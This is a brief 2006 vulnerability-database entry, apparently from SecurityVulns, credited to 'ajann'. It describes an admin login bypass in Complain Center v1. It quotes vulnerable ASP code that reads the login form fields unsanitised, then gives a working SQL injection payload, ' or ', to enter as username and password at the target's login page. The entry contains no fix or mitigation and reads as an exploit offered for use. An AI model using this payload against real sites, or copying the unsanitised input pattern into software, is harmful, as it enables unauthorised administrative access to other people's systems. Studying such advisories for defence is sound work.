Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection

2006-09-18T00:00:00
ID SECURITYVULNS:DOC:14300
Type securityvulns
Reporter Securityvulns
Modified 2006-09-18T00:00:00

Description

ENGLISH

Title : Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection

Author : ajann

Exploit;

[CODE]

loginprocess.asp: .. ... dim varUser dim varPass varUser=Request.Form("TxtUser") No Secure : ) varPass=Request.Form("TxtPass") No Secure : ) .. ...

//Before join login page http://[target]/[path]/login.asp

Username : ' or ' Password : ' or ' and Login Ok

ajann,Turkey